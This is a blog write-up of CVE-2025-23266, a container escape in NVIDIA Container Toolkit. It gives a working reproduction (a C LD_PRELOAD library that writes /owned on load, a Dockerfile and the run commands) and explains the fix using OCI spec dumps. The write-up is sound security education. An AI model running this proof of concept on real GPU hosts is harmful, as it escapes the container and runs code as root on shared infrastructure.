Post

CVE 2025-23266 - A Detailed writeup

CVE 2025-23266 - A Detailed writeup

Introduction

I read yesterday about a container escape on Nvidia’s Container Runtime. It comes without saying that this is a big deal, since the exploit is rather simple, and as AI workloads increases, so does the use of containerized applications and GPUS. The writeup itself is pretty good, although it does not address a few details regarding the container runtime, more specifically, how does container hooks work under the hood.

Writing this was a learning process to me, and I would like to share the whole journey with you.

Reproducing the issue

You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but easily adaptable for other distributions):

Install and Configure Nvidia Container Toolkit

  • Download the Nvidia Container Toolkit version 1.17.7 or earlier. The one I used was https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
  • Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
  • Then, run the following commands in order (as sudo):
1
2
3
4
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb 
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
  • Configure the NVidia runtime by running:
1
sudo nvidia-ctk runtime configure --runtime=docker
  • Then, restart docker with:
1
sudo systemctl restart docker

Some of these steps are taken from here

Create a shared library

This library will be loaded by the Docker Container runtime. As part of the exploit, we will use it as a parameter to LD_PRELOAD.

poc.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// poc.c - minimal malicious LD_PRELOAD library (creates /owned)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd != -1) {
        write(fd, "You have been owned!\n", 21);
        close(fd);
    }
}

Then build it with:

1
gcc -fPIC -shared -o poc.so poc.c

Configure hook

Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:

1
2
[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"

That enables the CUDA Forward Compatibility mode with a hook. A detailed explanation will follow later on this post

Create a docker image

This docker image will be contain the poc.so library that we created on the previous step.

Dockerfile

1
2
3
FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /

The Dockerfile and the poc.so must be in the same folder

Then build the image with:

1
docker build . -t nvidiascape-exploit

The command should create a new docker image with a tag (-t) nvidiascape-exploit.

Then, run it with the following command:

1
docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit

If everthing work right, you should see a /owned fine at the root directory.

Understanding the issue

To properly understand how this exploit was crafted, we need to touch in a couple of subjects first:

  • Dynamic linker behavior
  • Docker alternate runtimes
  • CUDA Forward Compatibility
  • Container Device Interface

Dynamic linker behavior

Whenever an application runs, it might require shared libraries - these are binaries that are not part of the application itself, but redistributed as part of another package. The dynamic linker job is to resolve these libraries during runtime.

The dynamic linker provides a feature where shared libraries under a directory set by the LD_PRELOAD environment variable takes precedence over all others. As a debugging feature, this might sound nice, but it is damning for sensitive applications. The ld.so man pages states:

1
2
3
4
5
6
   Secure-execution mode
       For security reasons, if the dynamic linker determines that a
       binary should be run in secure-execution mode, the effects of some
       environment variables are voided or modified, and furthermore
       those environment variables are stripped from the environment, so
       that the program does not even see the definitions. 

As en experiment, try to run this on your terminal:

1
sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find

You will end you with the same /owned file as the original exploit

The poc.so itself is rather simple: upon init, it creates a /owned file, then write some content to it.

1
2
void init(void) {
    int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);

The initializer is provided by the __attribute__((constructor)) function attributes.

Alternate runtimes

The default Docker runctime is runc. Howwever, you can opt to use other runtimes that implements the containerd shim API. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, you added an entry on the /etc/docker/daemon.json file, which should look like the following:

1
2
3
4
5
6
7
8
{
    "runtimes": {
        "nvidia": {
            "args": [],
            "path": "nvidia-container-runtime"
        }
    }

That tells Docker to use the nvidia-container-runtime application whenever you run a container with --runtime=nvidia

CUDA Forward Compatibility

CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:

  • You might build and ship containers with newer CUDA versions than what the host has installed.
  • Upgrading drivers on production systems isn’t always immediate or practical.

According to the documentation:

1
2
The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example, 
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.

It is important to notice that these libraries are installed on the host.

The NVidia Container Runtime implements forward compatibility with a hook. If the "nvidia-container-runtime.modes.legacy.cuda-compat-mode" config option is set to "hook", the “ enable-cuda-compat” is then used.

The hook will then execute and mount the compat libraries under “/usr/local/cuda/compat”. The mechanism used is called Container Device Interface

Container device interface

When the runtime starts, it executes the following function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// newNVIDIAContainerRuntime is a factory method that constructs a runtime based on the selected configuration and specified logger
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
  lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
  if err != nil {
    return nil, fmt.Errorf("error constructing low-level runtime: %v", err)
  }

  logger.Tracef("Using low-level runtime %v", lowLevelRuntime.String())
  if !oci.HasCreateSubcommand(argv) {
    logger.Tracef("Skipping modifier for non-create subcommand")
    return lowLevelRuntime, nil
  }

  ociSpec, err := oci.NewSpec(logger, argv)
  if err != nil {
    return nil, fmt.Errorf("error constructing OCI specification: %v", err)
  }

  specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
  if err != nil {
    return nil, fmt.Errorf("failed to construct OCI spec modifier: %v", err)
  }

  // Create the wrapping runtime with the specified modifier.
  r := oci.NewModifyingRuntimeWrapper(
    logger,
    lowLevelRuntime,
    ociSpec,
    specModifier,
  )

  return r, nil
}

The relevant parts are oci.NewSpec and newSpecModifier. These two functions:

  • Creates an OCI specification object (ociSpec) from the command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc).
  • Creates a spec modifier—a helper object that knows how to tweak the OCI spec (e.g., to inject NVIDIA-specific libraries, mounts, hooks, etc, needed for GPU containers).

The OCI spec describes the actual container.

You can see the actual spec by doing this:

  • Add the following to the newNVIDIAContainerRuntime function
1
2
3
4
5
6
7
  if logger != nil {
      if specJSON, err := json.MarshalIndent(ociSpec, "", "  "); err == nil {
          logger.Infof("OCI Spec: %s", string(specJSON))
      } else {
          logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
      }
  }
  • Edit the confit runtime (/etc/nvidia-container-runtime/config.toml) to enable logs:
1
2
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"

After that, you should see the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "HOSTNAME=e078abd14abe",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    },
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      }
    ]
  },
    //etc

You will notice that the LD_PRELOAD is part of the container spec.

To implement CUDA Forward Compatibiltity, the runtime edits the container spec by adding a new ‘containerCreate’ hook. This is mentioned on the Wiz writeup.

Before the fix, this is how the createContainer would look like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ]
      }

And this is how it would look after:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
    "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ],
        "env": [
          "NVIDIA_CTK_DEBUG=false"
        ]
      }

With the fix, the createContainer have an explicit “env” section, which is not present without the fix.

This was an interesting finding, and confirmed what the Wiz post said:

createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to

So to summarize, a spec like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
{
  "ociVersion": "1.2.1",
  "process": {
    "user": {
      "uid": 0,
      "gid": 0,
      "additionalGids": [0, 10]
    },
    "args": [
      "sh"
    ],
    "env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "LD_PRELOAD=./poc.so",
      "NVIDIA_VISIBLE_DEVICES=all"
    ],
    "cwd": "/",
    "capabilities": {
      "bounding": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "effective": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ],
      "permitted": [
        "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
        "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
        "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
      ]
    },
    "apparmorProfile": "docker-default",
    "oomScoreAdj": 0
  },
  "root": {
    "path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
  },
  "hostname": "e078abd14abe",
  "mounts": [
    {
      "destination": "/proc",
      "type": "proc",
      "source": "proc",
      "options": ["nosuid", "noexec", "nodev"]
    },
  ],
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": [
          "nvidia-container-runtime-hook",
          "prestart"
        ],
        "env": [
          "LANG=en_US.UTF-8",
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
          "NOTIFY_SOCKET=/run/systemd/notify",
          "INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
          "JOURNAL_STREAM=8:22608",
          "SYSTEMD_EXEC_PID=2089",
          "OTEL_SERVICE_NAME=dockerd",
          "OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
          "OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
          "TMPDIR=/var/lib/docker/tmp"
        ]
      },
      "createContainer": [
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "enable-cuda-compat",
          "--host-driver-version=575.64.03"
        ]
      },
      {
        "path": "/usr/bin/nvidia-ctk",
        "args": [
          "nvidia-ctk",
          "hook",
          "update-ldcache"
        ]
      }
    ]
  },

is vulnerable to a container escape because:

  • At the container level, it sets LD_PRELOAD=poc.so
  • The createContainer hook does not set any environment variable, which makes it inherit from the container
  • The /usr/bin/nvidia-ctk runs at the host level, with high privileges

Final thoughts

Although all of the above was mentioned in most of the posts regarding this vulnerability, it was an intesting nonetheless for me to dump the OCI Container spec and understand what is goign on “under the hood”.

At some point, I would like to cover the “last mile” for this vulnerability, specially this part:

prestart hooks run in a clean, isolated context

I could not find anything to support this claim. I might need to do a few experiments myself.

This post is licensed under CC BY 4.0 by the author.